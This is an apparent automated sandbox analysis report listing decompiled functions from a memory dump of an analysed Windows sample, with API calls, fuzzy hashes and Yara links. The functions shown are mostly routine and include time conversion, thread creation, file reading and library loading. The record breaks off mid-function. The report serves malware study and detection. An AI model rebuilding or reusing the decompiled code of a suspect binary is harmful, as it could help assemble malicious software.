                                                                                                • Instruction ID: 7a75bb327859eb2659dc8df3dd382e9718787d1dd5b64237a075061a11a99436
                                                                                                • Opcode Fuzzy Hash: dc4f15582d7156a15b2996a60c11fb5524768d57814c45d89d509fb6c11c0c68
                                                                                                • Instruction Fuzzy Hash: 9F411C716002147BDB206ABA8C85B7F37A4EF86376F14021FFC15D62B3EA7C4945866B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043D761, Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E0043D761(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043D8AE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00451D60(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x45a248;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x45a214;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00451D60( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00451D60(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00451D60(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E00438932();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E00438932();
					_t102 = 0x16;
					 *_t69 = _t102;
					E00437709();
					goto L11;
				}
				_t71 = E00438932();
				_t103 = 0x16;
				 *_t71 = _t103;
				E00437709();
				return _t103;
			}
































                                                                                                0x0043d76a
                                                                                                0x0043d76f
                                                                                                0x0043d78f
                                                                                                0x0043d790
                                                                                                0x0043d792
                                                                                                0x0043d795
                                                                                                0x0043d797
                                                                                                0x0043d7aa
                                                                                                0x0043d7ad
                                                                                                0x0043d7af
                                                                                                0x0043d7b2
                                                                                                0x0043d7b5
                                                                                                0x0043d7b8
                                                                                                0x0043d7c3
                                                                                                0x0043d7c5
                                                                                                0x0043d7c6
                                                                                                0x0043d7c8
                                                                                                0x0043d7e4
                                                                                                0x0043d7e8
                                                                                                0x0043d7f1
                                                                                                0x0043d7f6
                                                                                                0x0043d7fd
                                                                                                0x0043d80a
                                                                                                0x0043d80f
                                                                                                0x0043d819
                                                                                                0x0043d81e
                                                                                                0x0043d823
                                                                                                0x0043d825
                                                                                                0x0043d82c
                                                                                                0x0043d82e
                                                                                                0x0043d82e
                                                                                                0x0043d833
                                                                                                0x0043d838
                                                                                                0x0043d839
                                                                                                0x0043d83c
                                                                                                0x0043d844
                                                                                                0x0043d844
                                                                                                0x0043d845
                                                                                                0x0043d853
                                                                                                0x0043d85b
                                                                                                0x0043d868
                                                                                                0x0043d869
                                                                                                0x0043d873
                                                                                                0x0043d879
                                                                                                0x0043d883
                                                                                                0x0043d88a
                                                                                                0x0043d88e
                                                                                                0x0043d892
                                                                                                0x0043d897
                                                                                                0x0043d89b
                                                                                                0x0043d8a3
                                                                                                0x0043d8a3
                                                                                                0x0043d8a5
                                                                                                0x0043d8a8
                                                                                                0x00000000
                                                                                                0x0043d83e
                                                                                                0x0043d83e
                                                                                                0x0043d83e
                                                                                                0x0043d83f
                                                                                                0x0043d83f
                                                                                                0x00000000
                                                                                                0x0043d83e
                                                                                                0x0043d83c
                                                                                                0x0043d7ca
                                                                                                0x0043d7d3
                                                                                                0x0043d7d3
                                                                                                0x0043d7da
                                                                                                0x0043d7db
                                                                                                0x0043d7dd
                                                                                                0x0043d7dd
                                                                                                0x00000000
                                                                                                0x0043d7dd
                                                                                                0x0043d7cc
                                                                                                0x0043d7d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043d7d1
                                                                                                0x0043d7ba
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043d7bc
                                                                                                0x0043d7c1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043d7c1
                                                                                                0x0043d799
                                                                                                0x0043d7a0
                                                                                                0x0043d7a1
                                                                                                0x0043d7a3
                                                                                                0x00000000
                                                                                                0x0043d7a3
                                                                                                0x0043d771
                                                                                                0x0043d778
                                                                                                0x0043d779
                                                                                                0x0043d77b
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfcc83807e8aa48eb067a98189ec7e97f374b551529161a41f4ec273b6343dfb
                                                                                                • Instruction ID: 60db8195558ebea133a4f370ada165e82a5afcab0d0b3de8392f875202c89dd8
                                                                                                • Opcode Fuzzy Hash: cfcc83807e8aa48eb067a98189ec7e97f374b551529161a41f4ec273b6343dfb
                                                                                                • Instruction Fuzzy Hash: 82410471E00308AFD724AF78DC41BAABBA8EF8C714F10962FF111DB691D779A9058784
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00404DB8, Relevance: 6.1, APIs: 4, Instructions: 128synchronizationthreadCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00404DB8(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x54) =  *(__ecx + 0x54) & 0x00000000;
				E004020C7(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x58; // 0x46e2c0
				_t41 = _t8;
				while(E00404FEF(_t105, E00401F87(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x30; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E0040247B()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E0040247B();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x54)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						E00401FC3( &_v44, _t101, _t105, E00404287(_t103,  &_v68, _v16, 0xffffffff));
						E00401FB9();
						E00401FC3( &_v44, _t101, _t105, E00404287( &_v44,  &_v68, 0, _v12));
						E00401FB9();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0xc; // 0x46e274
							E00401F9F(_t30,  &_v44);
							 *(_t105 + 0x24) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0);
							_t33 = _t105 + 0x24; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x24; // 0x0
							CloseHandle( *_t34);
						} else {
							_t107 = _t106 - 0x18;
							E004020DE(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						E00401FC3(_t103, _t101, _t105, E00404287(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						E00401FB9();
						_t70 = E0040247B();
						_t38 = _t105 + 0x58; // 0x46e2c0
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return E00401FB9();
			}





















                                                                                                0x00404db8
                                                                                                0x00404dbe
                                                                                                0x00404dc4
                                                                                                0x00404dca
                                                                                                0x00404dcd
                                                                                                0x00404dd1
                                                                                                0x00404dd6
                                                                                                0x00404dd9
                                                                                                0x00404dd9
                                                                                                0x00404ddc
                                                                                                0x00404df8
                                                                                                0x00404df8
                                                                                                0x00404e01
                                                                                                0x00404e0d
                                                                                                0x00404e2b
                                                                                                0x00404e2b
                                                                                                0x00404e0f
                                                                                                0x00404e11
                                                                                                0x00404e13
                                                                                                0x00404e1b
                                                                                                0x00404e21
                                                                                                0x00404e26
                                                                                                0x00404e26
                                                                                                0x00404e2f
                                                                                                0x00404e35
                                                                                                0x00404e4a
                                                                                                0x00404e52
                                                                                                0x00404e6c
                                                                                                0x00404e74
                                                                                                0x00404e79
                                                                                                0x00404e80
                                                                                                0x00404e97
                                                                                                0x00404e9a
                                                                                                0x00404eab
                                                                                                0x00404eae
                                                                                                0x00404eb8
                                                                                                0x00404ec0
                                                                                                0x00404ec3
                                                                                                0x00404ec9
                                                                                                0x00404ecc
                                                                                                0x00404e82
                                                                                                0x00404e82
                                                                                                0x00404e88
                                                                                                0x00404e8e
                                                                                                0x00404e91
                                                                                                0x00404e91
                                                                                                0x00404ee8
                                                                                                0x00404ef0
                                                                                                0x00404ef7
                                                                                                0x00404efe
                                                                                                0x00404efe
                                                                                                0x00404f01
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00404f01
                                                                                                0x00000000
                                                                                                0x00404e2f
                                                                                                0x00404f15

                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000,000000FF,00000000,00000000,0046E2C0), ref: 00404EA5
                                                                                                • CreateThread.KERNEL32(00000000,00000000,00000000,0046E268,00000000,00000000), ref: 00404EB8
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00404D8B,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404EC3
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00404D8B,00000000,00000073,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00404ECC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 681d0d4f5c795077d1324a474250ae06d73184dde2bf6fe4c6d1fd733aa886b6
                                                                                                • Instruction ID: 28372df4b1887f6dd25af6fd127a3b2567dcd40b245f5bd33a3f33c0b357cf73
                                                                                                • Opcode Fuzzy Hash: 681d0d4f5c795077d1324a474250ae06d73184dde2bf6fe4c6d1fd733aa886b6
                                                                                                • Instruction Fuzzy Hash: C24165B1900219AFCB10EBA1CC55DFEB7BDAF44318F04066EF952B32D1DB74A9458B64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043E568, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E568(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46d4d4; // 0x676fa0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E00440628(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004414D5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E00448F8F();
									E004414D5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                                                                                                0x0043e568
                                                                                                0x0043e56b
                                                                                                0x0043e573
                                                                                                0x0043e57c
                                                                                                0x0043e5d1
                                                                                                0x0043e58a
                                                                                                0x0043e590
                                                                                                0x0043e594
                                                                                                0x0043e5e2
                                                                                                0x0043e5e2
                                                                                                0x0043e596
                                                                                                0x0043e59e
                                                                                                0x0043e5a1
                                                                                                0x0043e5a4
                                                                                                0x0043e5db
                                                                                                0x0043e5dc
                                                                                                0x00000000
                                                                                                0x0043e5a6
                                                                                                0x0043e5b0
                                                                                                0x0043e5bc
                                                                                                0x00000000
                                                                                                0x0043e5be
                                                                                                0x0043e5be
                                                                                                0x0043e5bf
                                                                                                0x0043e5c0
                                                                                                0x0043e5c6
                                                                                                0x0043e5cb
                                                                                                0x0043e5ce
                                                                                                0x00000000
                                                                                                0x0043e5ce
                                                                                                0x0043e5bc
                                                                                                0x0043e5a4
                                                                                                0x0043e5d7
                                                                                                0x0043e5da
                                                                                                0x00000000
                                                                                                0x0043e5da
                                                                                                0x0043e5d5
                                                                                                0x00000000
                                                                                                0x0043e575
                                                                                                0x0043e579
                                                                                                0x0043e579
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 31092063f941bbd179fece980e0009d3b1031cb35a866333853724fabf375944
                                                                                                • Instruction ID: 6867e292330e79d8cb5cf179cb3cb52e1b05183c244f7a69f06961832baa9cdc
                                                                                                • Opcode Fuzzy Hash: 31092063f941bbd179fece980e0009d3b1031cb35a866333853724fabf375944
                                                                                                • Instruction Fuzzy Hash: 5801DFB260A2167EFA201ABA2CC0F2B231DCB853BCF35173BB521552D1EE68CD504128
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00408BF6, Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 94%
                                                                                                			E00408BF6(void* __ecx, void* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x46e458; // 0x0
				_t9 = _t8 |  *0x46e45c;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E00401EDD(0x46e410), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46e45c; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46e458)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E004095C0(0, _t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46c9c4 - 0x31;
						if( *0x46c9c4 == 0x31) {
							E004074B3(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00408778(_t24);
						}
					}
				}
				return _t9;
			}












                                                                                                0x00408bf6
                                                                                                0x00408bf6
                                                                                                0x00408bfb
                                                                                                0x00408c04
                                                                                                0x00408c06
                                                                                                0x00408c0e
                                                                                                0x00408c11
                                                                                                0x00408c2c
                                                                                                0x00408c32
                                                                                                0x00408c37
                                                                                                0x00408c77
                                                                                                0x00408c39
                                                                                                0x00408c3b
                                                                                                0x00408c41
                                                                                                0x00408c47
                                                                                                0x00408c53
                                                                                                0x00408c5a
                                                                                                0x00408c5e
                                                                                                0x00408c5e
                                                                                                0x00408c68
                                                                                                0x00408c68
                                                                                                0x00408c6f
                                                                                                0x00408c6f
                                                                                                0x00408c7a
                                                                                                0x00408c83
                                                                                                0x00408c85
                                                                                                0x00408c8c
                                                                                                0x00408c97
                                                                                                0x00000000
                                                                                                0x00408c9e
                                                                                                0x00408c8c
                                                                                                0x00408c83
                                                                                                0x00408ca6

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408CCD), ref: 00408C2C
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408CCD), ref: 00408C3B
                                                                                                • Sleep.KERNEL32(00002710,?,?,?,00408CCD), ref: 00408C68
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00408CCD), ref: 00408C6F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                • String ID:
                                                                                                • API String ID: 1958988193-0
                                                                                                • Opcode ID: be646a1e3cef3e12182313e282cc57b63c4a231ac640fc345a1bd5333c15ff99
                                                                                                • Instruction ID: 039e6b4d1a39b176b40cb78f69a4d03d23e2fd241c09241412723c9c3fc75153
                                                                                                • Opcode Fuzzy Hash: be646a1e3cef3e12182313e282cc57b63c4a231ac640fc345a1bd5333c15ff99
                                                                                                • Instruction Fuzzy Hash: DB110B6020A6906AF62157359ED8A2E3AAAA745344F04047EF1C1562D2CE7C6C54827E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004432B9, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E004432B9(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46d658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x459be8 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x4cc22725
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                                                                                                0x004432be
                                                                                                0x004432c2
                                                                                                0x004432c9
                                                                                                0x004432cd
                                                                                                0x004432db
                                                                                                0x004432f1
                                                                                                0x004432f5
                                                                                                0x0044331e
                                                                                                0x00443320
                                                                                                0x00443324
                                                                                                0x00443327
                                                                                                0x00443327
                                                                                                0x0044332d
                                                                                                0x0044332f
                                                                                                0x00000000
                                                                                                0x00443330
                                                                                                0x004432f7
                                                                                                0x00443300
                                                                                                0x0044330f
                                                                                                0x00443302
                                                                                                0x00443305
                                                                                                0x0044330b
                                                                                                0x0044330b
                                                                                                0x00443313
                                                                                                0x00000000
                                                                                                0x00443315
                                                                                                0x00443318
                                                                                                0x0044331a
                                                                                                0x00000000
                                                                                                0x0044331a
                                                                                                0x00443313
                                                                                                0x004432cf
                                                                                                0x004432d4
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue), ref: 004432EB
                                                                                                • GetLastError.KERNEL32(?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue,0045A0D8,0045A0E0,00000000,00000364,?,0044303A), ref: 004432F7
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00443260,?,00000000,00000000,00000000,?,0044358C,00000006,FlsSetValue,0045A0D8,0045A0E0,00000000), ref: 00443305
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 3177248105-0
                                                                                                • Opcode ID: b5d85f36532d0ec1a8daf6bde85ccfbefa011f161d0122d1a2531d102de6b0dd
                                                                                                • Instruction ID: 2820906f18e0fa43e902432818b1c23970b16bf2b47f6215d50acfb685d4c685
                                                                                                • Opcode Fuzzy Hash: b5d85f36532d0ec1a8daf6bde85ccfbefa011f161d0122d1a2531d102de6b0dd
                                                                                                • Instruction Fuzzy Hash: 1001D432605322ABEB218E69AC449577798AF44FA3B200131FD1AD7281DE24DD41C6E8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004183CC, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E004183CC(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E0040244B(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, E00401F87(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}











                                                                                                0x004183cf
                                                                                                0x004183d0
                                                                                                0x004183d3
                                                                                                0x004183d5
                                                                                                0x004183ef
                                                                                                0x004183f4
                                                                                                0x00418406
                                                                                                0x0041840a
                                                                                                0x00418418
                                                                                                0x0041842b
                                                                                                0x0041842d
                                                                                                0x0041842d
                                                                                                0x00418430
                                                                                                0x00418436
                                                                                                0x004183f6
                                                                                                0x004183f6
                                                                                                0x004183f6
                                                                                                0x0041843d

                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183FD
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 00418422
                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00404211,004604D4), ref: 00418430
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 3919263394-0
                                                                                                • Opcode ID: 21d6efb8e26c4bf7db253578d092916550466077a5b15231f7dae7ce33d80214
                                                                                                • Instruction ID: 6ab1ffdcf923dab00a7d0f3cb8cc01fec746bd8065e2cf1a542a30ce12d0a391
                                                                                                • Opcode Fuzzy Hash: 21d6efb8e26c4bf7db253578d092916550466077a5b15231f7dae7ce33d80214
                                                                                                • Instruction Fuzzy Hash: 4701D670501218BFE7105B61AC85EFF777CDB86799F1002AEFD01A3281DA744D419675
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00433B91, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 19%
                                                                                                			E00433B91(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E004341E0(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0043316B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
